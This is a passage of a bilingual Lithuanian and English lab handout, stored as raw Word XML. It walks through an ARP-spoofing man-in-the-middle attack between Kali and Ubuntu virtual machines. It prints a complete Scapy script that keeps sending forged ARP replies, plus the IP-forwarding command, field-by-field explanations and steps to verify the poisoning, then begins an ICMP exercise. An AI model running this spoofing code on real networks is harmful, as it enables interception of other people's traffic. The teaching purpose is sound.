    <w:p w14:paraId="10C2E91F" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>frame_gateway = ether_gateway/arp_gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20760DC6" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFB31A7" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>sendp(frame_victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EACD3DF" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>sendp(frame_gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0717A4" w14:textId="6748E3C2" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABDC0D1" w14:textId="0D56D5AB" w:rsidR="00BC742C" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00BC742C">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F835EF" w14:textId="0264F574" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">** </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Pirmas paketas (pažymėtas žaliai)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> **</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* dst = Aukos MAC adresas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Psrc = Routerio IP adresas. Jis skirtas tam, kad Kali apsimestų jog jis yra routeris.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwsrc = Kali linux MAC adresas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Pdst = Aukos IP adresas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t xml:space="preserve">* Hwdst </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:softHyphen/>
        <w:t>=  Aukos MAC adresas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF66EF" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">** </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Antras paketas (pažymėtas raudonai)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> **</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Dst = Routerio MAC adresas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Psrc = Aukos IP adresas. Jis skirtas tam, jog apsimestume, kad mūsų Kali sistema iš tikrųjų yra Ubuntu klientas.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwsrc = Kali linux MAC adresas|</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Pdst = Routerio IP adresas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwdst = Routerio MAC adresas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F071C" w14:textId="77777777" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999"/>
    <w:p w14:paraId="5F4206B4" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00F60999" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>Skripte yra eilutė „time.sleep(2)“, kuri atskiria pirmą paketą nuo antrojo, tam kad ataka įvyktų sklandžiai. Taip pat, ataka turi veikti nenutraukiamai, kitaip ARP lentelės atsistatys įrenginyje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1920F" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00F60999"/>
    <w:p w14:paraId="6D21002F" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00F60999"/>
    <w:p w14:paraId="7227AB5F" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00F60999"/>
    <w:p w14:paraId="0F73BDC4" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F62136F" w14:textId="3D2EBA7B" w:rsidR="00F60999" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>To make the MITM fully function, you need to configure Kali to operate in router mode (so it can forward packets). You can do this from the Kali terminal by entering: sudo sysctl -w net.ipv4.ip_forward=1“</w:t>
      </w:r>
      <w:r w:rsidR="00F60999" w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>On the Kali system terminal, navigate to the Documents folder (cd /home/kali/Documents) and create a file named MITM.py (touch MITM.py). Use the operating system’s network utilities to determine the Kali host’s IP and MAC addresses; repeat the same checks on the Ubuntu host. Inspect the ARP table on the Kali machine to learn the router’s IP and MAC addresses. To perform the experiment, use the previously created MITM.py file and open it in a text editor (nano MITM.py) to insert the script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0F91E" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51E0D8" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B9C5B" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A1977" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ether_victim = Ether(dst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FABDF" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>arp_victim = ARP(op=2, psrc="10.0.2.2", hwsrc="08:00:27:1f:b7:23",  pdst="10.0.2.4", hwdst="08:00:27:37:4e:f3")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8141FB" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>frame_victim = ether_victim/arp_victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCD2E53" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>ether_gateway = Ether(dst="08:00:27:d2:d3:36")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76EE9C" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>arp_gateway = ARP(op=2, psrc="10.0.2.4", hwsrc="08:00:27:1f:b7:23", pdst="10.0.2.2", hwdst="08:00:27:d2:d3:36")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ACA2F4" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>frame_gateway = ether_gateway/arp_gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F41AAB" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAFFC84" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>sendp(frame_victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C775174" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>sendp(frame_gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087CD8DD" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898445E" w14:textId="77777777" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CD1523" w:rsidP="00CD1523">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A83D0F" w14:textId="77C3C01F" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">** </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>First packet (marked in green)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C298C0A" w14:textId="671D4FC6" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* dst = Victim’s MAC address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Psrc = Router’s IP address. It is used so that Kali pretends to be the router.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwsrc = Kali Linux MAC address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Pdst = Victim’s IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwdst = Victim’s MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED33F12" w14:textId="77777777" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286D3685" w14:textId="77777777" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77131A35" w14:textId="77777777" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABA27EA" w14:textId="77777777" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5B3CF6" w14:textId="75B726ED" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">** </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Second packet (marked in red)</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> **</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B4D76" w14:textId="756D1BF1" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>* Dst = Router’s MAC address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Psrc = Victim’s IP address. It is used so that our Kali system pretends to be the Ubuntu client.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwsrc = Kali Linux MAC address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Pdst = Router’s IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>* Hwdst = Router’s MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DD602B" w14:textId="77777777" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00CA1A71">
      <w:r w:rsidRPr="00352171">
        <w:t>The script contains the line time.sleep(2), which separates the first packet from the second one to ensure the attack executes smoothly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1BCDBF" w14:textId="32ACA182" w:rsidR="00CD1523" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00F60999">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>Additionally, the attack must run continuously; otherwise, the ARP tables on the device will restore themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD63F0" w14:textId="1B051173" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7B3595" wp14:editId="5432DC3E">
            <wp:extent cx="6645910" cy="1217930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1329859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9852" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1217930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0ED7FC" w14:textId="53FC4D93" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="00CA1A71" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6164A420" wp14:editId="21BEA59C">
            <wp:extent cx="4867275" cy="1323084"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21281760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6064" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4888828" cy="1328943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7545A7" w14:textId="1EAD874F" w:rsidR="00CA1A71" w:rsidRPr="00352171" w:rsidRDefault="001B56D3" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="022C9913" wp14:editId="0C784140">
            <wp:extent cx="6645910" cy="1026160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="16439289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28975" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1026160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="183671E5" w14:textId="7485A514" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="461AE89A" wp14:editId="6860DA19">
            <wp:extent cx="6645910" cy="1043940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="2039144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4646" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1043940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667BC00" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999"/>
    <w:p w14:paraId="3061F5F4" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999"/>
    <w:p w14:paraId="69FE11D9" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999"/>
    <w:p w14:paraId="32A0A002" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999"/>
    <w:p w14:paraId="17696A42" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999"/>
    <w:p w14:paraId="55885B01" w14:textId="421E212C" w:rsidR="001B56D3" w:rsidRPr="00352171" w:rsidRDefault="001B56D3" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LT: </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t xml:space="preserve">Tam, kad matytume rezultatą, nukeliaujame į Ubuntu sistemos terminalą ir įrašome „arp -n“. Kaip matote, mano atveju routerio MAC yra = 08:00:27:d2:d3:36. Grįžtame atgal į Kali sistemos terminalą ir paleidžiame skriptą „python MITM.py“. Grįžtame atgal į Ubuntu sistemos terminalą ir pakartojame „arp -n“ komandą. Kaip matote, routerio MAC adresas pasikeitė į Kali MAC adresą. Mano Atveju 08:00:27:d2:d3:36 </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> 08:00:27:1f:b7:23</w:t>
      </w:r>
      <w:r w:rsidR="00864647" w:rsidRPr="00352171">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821C7B1" w14:textId="0100F7E6" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>Taip pat, Wireshark programoje matome siunčiamus atsakymus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264BE867" w14:textId="48687A2B" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00F60999">
      <w:r w:rsidRPr="00352171">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D929C5" w14:textId="0176C479" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">To see the result, we go to the Ubuntu system terminal and enter arp -n. As you can see, in my case the router’s MAC is 08:00:27:d2:d3:36. We go back to the Kali system terminal and run the script python MITM.py. We return to the Ubuntu system terminal and repeat the arp -n command. As you can see, the router’s MAC address changed to the Kali MAC address. In my case 08:00:27:d2:d3:36 </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> 08:00:27:1f:b7:23.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C65150" w14:textId="4DD8ACB6" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Also, in Wireshark we can see the ARP replies being sent. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C68A3A" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647"/>
    <w:p w14:paraId="7D223C13" w14:textId="77777777" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F16CC5" w14:textId="1F65B9C4" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:spacing w:val="-10"/>
          <w:kern w:val="28"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3196FD" w14:textId="4D2A89B3" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 5</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13222F86" w14:textId="4E747C44" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ICMP protokolas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(ICMP protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB2BC04" w14:textId="6C5279F6" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="331DC72E" wp14:editId="214E40F9">
            <wp:extent cx="5048250" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1470600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0023" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048250" cy="2724150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C2D58" w14:textId="4CB4B371" w:rsidR="00864647" w:rsidRPr="00352171" w:rsidRDefault="00864647" w:rsidP="00864647">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B54CDB7" wp14:editId="224C65DA">
            <wp:extent cx="6645910" cy="627380"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="184276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4004" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
